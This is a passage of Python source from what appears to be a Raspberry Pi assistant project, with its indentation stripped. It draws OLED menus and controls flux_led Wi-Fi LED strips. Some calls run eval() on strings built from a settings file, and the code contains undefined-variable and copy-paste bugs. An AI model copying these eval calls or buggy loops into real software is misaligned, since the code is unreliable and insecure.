draw.rectangle((41, 20, 56, 30), outline=255, fill=0)
draw.text((43,20), shour, font=font, fill=225)
elif sel[1] == 1:
if sel[0] :
draw.rectangle((71, 20, 86, 30), outline=255, fill=255)
draw.text((43,20), ' ' + sminu, font=font, fill=0)
else:
draw.rectangle((71, 20, 86, 30), outline=255, fill=0)
draw.text((43,20),' ' + sminu, font=font, fill=225)
draw.text((61,20),':', font=font, fill=225)
if int(time.strftime("%S")) % 2 == 0 :
draw.text((49,54),str(time.strftime("%H")) + ":" + str(time.strftime("%M")) , font=font, fill=225)
else :
draw.text((49,54),str(time.strftime("%H")) + " " + str(time.strftime("%M")) , font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
self.veil = 0
while buton > 0 and not self.al:
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
elif self.buton[0] == 1 :
del self.buton[0]
sel[0] = not sel[0]
elif self.buton[0] == 2 :
del self.buton[0]
if sel[0]:
if sel[1] == 0:
if ops:
if shour == '23':
shour = "--"
elif shour == '--':
shour = "00"
else:
shour = Myassistant.ad_hour(shour,1)
else:
shour = Myassistant.ad_hour(shour,1)
elif sel[1] == 1:
if ops:
if sminu == '59':
sminu = "--"
elif sminu == '--':
sminu = "00"
else:
sminu = Myassistant.ad_min(sminu,1)
else:
sminu = Myassistant.ad_min(sminu,1)
elif sel[1] == 2:
if ops:
if sday == 'Sunday':
sday = "-"
elif sday == '-':
sday = "Monday"
else:
sday = Myassistant.ad_day(sday,1)
else:
sday = Myassistant.ad_day(sday,1)
else:
sel[1] = sel[1] + 1
if sel[1] > 2 :
sel[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if sel[0]:
if sel[1] == 0:
if ops:
if shour == '00':
shour = "--"
elif shour == '--':
shour = "23"
else:
shour = Myassistant.remove_hour(shour,1)
else:
shour = Myassistant.remove_hour(shour,1)
elif sel[1] == 1:
if ops:
if sminu == '00':
sminu = "--"
elif sminu == '--':
sminu = "59"
else:
sminu = Myassistant.remove_min(sminu,1)
else:
sminu = Myassistant.remove_min(sminu,1)
elif sel[1] == 2:
if ops:
if sday == 'Monday':
sday = "-"
elif sday == '-':
sday = "Sunday"
else:
sday = Myassistant.remove_day(sday,1)
else:
sday = Myassistant.remove_day(sday,1)
else:
sel[1] = sel[1] - 1
if sel[1] < 0 :
sel[1] = 2
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
if cont:
return ['--','--','-']
else:
return [shour, sminu, sday]
def select_list(self, listl, name):
choice = True
selist = [15, 0]
memy = 3
x = 2
xpat = 0
direcpat = 0
direc = 0
namegf = name
listachang = listl
response = ''
historlist = []
historlist.append(listl)
while choice and not self.al:
listaff = []
for hap in listachang:
listaff.append(hap[0])
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if len(namegf) * 6 > 128 :
if direcpat == 0 :
if len(namegf) * 6 + xpat > 128 :
xpat = xpat - 4
else :
direcpat = 1
else :
xpat = xpat + 4
if xpat > 1 :
direcpat = 0
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((xpat,0), namegf, font=font, fill=225)
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
xpat = 0
if not len(historlist) - 2 < 0:
namegf = namegf.split('>')
namegf = namegf[len(namegf)-2]
listachang = historlist[len(historlist)-2]
del historlist[len(historlist)-1]
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
xpat = 0
if '[' in str(listachang[selist[1]][1]):
namegf = namegf + '>' + str(listachang[selist[1]][1][1])
historlist.append(listachang[selist[1]][1][0])
listachang = listachang[selist[1]][1][0]
else:
response = str(listachang[selist[1]][1])
choice = False
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
memy = memy - 12
selist[0] = 51
elif self.buton[0] == 3 :
del self.buton[0]
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
elif len(namegf) * 6 > 128 :
buton = buton - 1
if choice:
return None
else:
return response
def select_search_list(self, listl):
choice = True
selist = [15, 0]
memy = 3
x = 2
direcpat = 0
direc = 0
namegf = ''
listachang = listl
response = ''
hresqtr = False
seraselect = [0,False]
while choice and not self.al:
if not (namegf == '' or namegf == ' '):
kghl = []
for hap in listl:
kghl.append(hap[0])
if namegf[len(namegf)-1] == ' ':
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
del hkhkk[len(hkhkk)-1]
fghdhgh = "".join(hkhkk)
nlistv = Myassistant.search_wordt(fghdhgh,kghl)
else:
nlistv = Myassistant.search_wordt(namegf,kghl)
listachang = []
for xmots in nlistv:
wlit = len(listl)-1
while wlit > -1:
if xmots == listl[wlit][0]:
listachang.append([listl[wlit][0],listl[wlit][1]])
wlit = -1
wlit = wlit - 1
else:
listachang = listl
listaff = []
for hap in listachang:
listaff.append(hap[0])
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if not listaff == [] and hresqtr:
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if hresqtr:
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((0,-2), namegf, font=font, fill=225)
if not hresqtr:
if seraselect[1]:
draw.rectangle((seraselect[0]*6, 0, seraselect[0]*6+5, 10), outline=255, fill=255)
if len(namegf) == 0:
namegf = ' '
seraselect[0] = 0
draw.text((seraselect[0]*6,-1), namegf[seraselect[0]], font=font, fill=0)
else:
draw.line((seraselect[0]*6, 10, seraselect[0]*6+5, 10), fill=255)
if hresqtr:
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
if not listaff == []:
hresqtr = not hresqtr
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
if hresqtr:
response = str(listachang[selist[1]][1])
choice = False
else:
seraselect[1] = not seraselect[1]
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if hresqtr:
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
memy = memy - 12
selist[0] = 51
else:
if seraselect[1]:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
hkhkk[len(hkhkk)-1] = Myassistant.ad_letter(hkhkk[len(hkhkk)-1],1)
namegf = "".join(hkhkk)
else:
if not seraselect[0]+1 > 20:
namegf = namegf+' '
seraselect[0] = len(namegf)-1
elif self.buton[0] == 3 :
del self.buton[0]
if hresqtr:
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
else:
if seraselect[1]:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
hkhkk[len(hkhkk)-1] = Myassistant.remove_letter(hkhkk[len(hkhkk)-1],1)
namegf = "".join(hkhkk)
else:
if not seraselect[0]-1 < 0:
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
del hkhkk[len(hkhkk)-1]
namegf = "".join(hkhkk)
seraselect[0] = seraselect[0]-1
else:
namegf = ""
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if not listaff == [] and hresqtr:
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
if choice:
return None
else:
return response
def select_led_strip_color_alarm(self):
try:
response = None
ifwantreload = 0
cont = True
name = 'All'
listwifi={}
name_wifi_led = []
ip_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
coloraction = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 0]
save_list_color = []
for adresr in listwifi:
wifiled = listwifi[adress]
y = wifiled.getRgbw()
save_list_color.append([int(y[0]),int(y[1]),int(y[2]),int(y[3]),wifiled.is_on])
r = 0
g = 0
b = 0
w = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adress in listwifi:
wifiled = listwifi[adress]
wifiled.refreshState()
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
if selection[1] == 4:
sunrise = Image.open('~/google-assistant/src/images/led_strip/sunrise.png')
sunrise = sunrise.resize((15,13))
sunrise = ImageOps.invert(sunrise)
image.paste(sunrise, (111,11))
draw.rectangle((111, 8, 124, 14), outline=0, fill=0)
draw.line((109,15,109,25), fill=255)
draw.line((109,25,127,25), fill=255)
draw.line((127,15,127,25), fill=255)
draw.line((109,15,127,15), fill=255)
else:
sunrise = Image.open('~/google-assistant/src/images/led_strip/sunrise.png')
sunrise = sunrise.resize((15,13))
sunrise = ImageOps.invert(sunrise)
image.paste(sunrise, (111,11))
draw.rectangle((111, 8, 126, 15), outline=0, fill=0)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((96, 15, (len(str('+')) * 6) + 98, 25), outline=255, fill=0)
draw.text((98,15), '+', font=font, fill=225)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
buton = 0
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
name = 'All'
elif selection[1] == 3:
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
efdgk = Myassistant.select_search_list(self,jgiush)
if not efdgk == None:
resultintero = flux_led.utils.color_object_to_tuple(efdgk)
if name == 'All':
for adress in listwifi:
wifiled = listwifi[adress]
if wifiled.brightness+10 > 255 :
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
if brightnes+10 > 255:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
response = None
elif selection[1] == 4:
choicoco = Myassistant.select_list(self,[['Sunset','sunset'],['Sunrise','sunrise'],['Exit','exit']],'choice')
delay = Myassistant.select_cursor(self,30,0,1,1,"'",'delay')
if choicoco == 'sunset':
start = Myassistant.select_cursor(self,100,0,5,100,"%",'start')
stop = Myassistant.select_cursor(self,100,0,5,0,"%",'end')
response = choicoco+','+str(start)+','+str(stop)+','+str(delay)
elif choicoco == 'sunrise':
start = Myassistant.select_cursor(self,100,0,5,0,"%",'start')
stop = Myassistant.select_cursor(self,100,0,5,100,"%",'end')
response = choicoco+','+str(start)+','+str(stop)+','+str(delay)
elif selection[1] == 5:
if not selection[0]:
selection[0] = not selection[0]
if name == 'All':
for adress in listwifi:
wifiled = listwifi[adress]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
selection[0] = not selection[0]
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
ffgghhfg = str(coloraction[selectlist]).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + ffgghhfg)
except:
print('Failed to execute : "' + ffgghhfg + '"')
else:
try:
eval('wifiled.' + ffgghhfg)
except:
print('Failed to execute : "' + ffgghhfg + '"')
response = ffgghhfg
ifwantreload = 0
else:
selection[0] = not selection[0]
elif self.buton[0] == 2 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
response = None
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
else:
if ison:
wifiled.turnOff()
response = 'turnOff()'
else:
wifiled.turnOn()
response = 'turnOn()'
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
response = None
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
response = None
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
response = None
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
response = None
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
response = None
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
response = str(coloraction[selectlist])
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
resoul = ['','']
if name == 'All':
resoul[0] = []
for adress in ip_wifi_led:
resoul[0].append(adress)
else:
resoul[0] = ip_wifi_led[name_wifi_led.index(name)]
if response == 'turnOn()':
resoul[1] = 'setModeDefault()'
elif response == 'turnOff()':
resoul[1] = 'setModeTurnOff()'
elif 'sunset' in str(response):
ret = response.split(',')
resoul[1] = 'setModeSunset('+str(ret[1])+','+str(ret[2])+','+str(ret[3])+')'
elif 'sunrise' in str(response):
ret = response.split(',')
resoul[1] = 'setModeSunrise('+str(ret[1])+','+str(ret[2])+','+str(ret[3])+')'
elif 'setPresetPattern' in str(response):
kdkd = response.split(',')
shemode = kdkd[0].replace('setPresetPattern(','')
spedmode = kdkd[1].replace(')','')
resoul[1] = 'setModePresetPattern('+str(shemode)+','+str(spedmode)+')'
else:
if name == 'All':
r = 0
g = 0
b = 0
w = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
else:
wifiled = listwifi[name]
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
if w == 0:
resoul[1] = 'setModeColor('+str(r)+','+str(g)+','+str(b)+')'
else:
resoul[1] = 'setModeWarmWhite('+str(w)+')'
i = len(save_list_color) - 1
while i > -1:
wifiled = led.WifiLedBulb(ip_wifi_led[i])
if save_list_color[i][4]:
wifiled.turnOn()
wifiled.setRgbw(r=save_list_color[i][0],g=save_list_color[i][1],b=save_list_color[i][2],w=save_list_color[i][3])
else:
wifiled.turnOff()
i = i - 1
return resoul
except BrokenPipeError:
self.veil = 0
print('Failed : "led strip"')
resoul = ['','']
resoul[0] = []
for adresr in ip_wifi_led:
resoul[0].append(adress)
resoul[1] = 'setModeDefault()'
return resoul
def select_led_strip_color_all(self):
try:
response = None
ifwantreload = 0
cont = True
name = 'All'
listwifi={}
ip_wifi_led=[]
name_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = []
coloraction = []
for color in settings.get('Custom colors'):
colorlist.append(color[0])
coloraction.append(color[1])
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 0]
save_list_color = []
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
save_list_color.append([int(y[0]),int(y[1]),int(y[2]),int(y[3]),wifiled.is_on])
r = 0
g = 0
b = 0
w = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
wifiled.refreshState()
y = wifiled.getRgbw()
r = r + y[0]
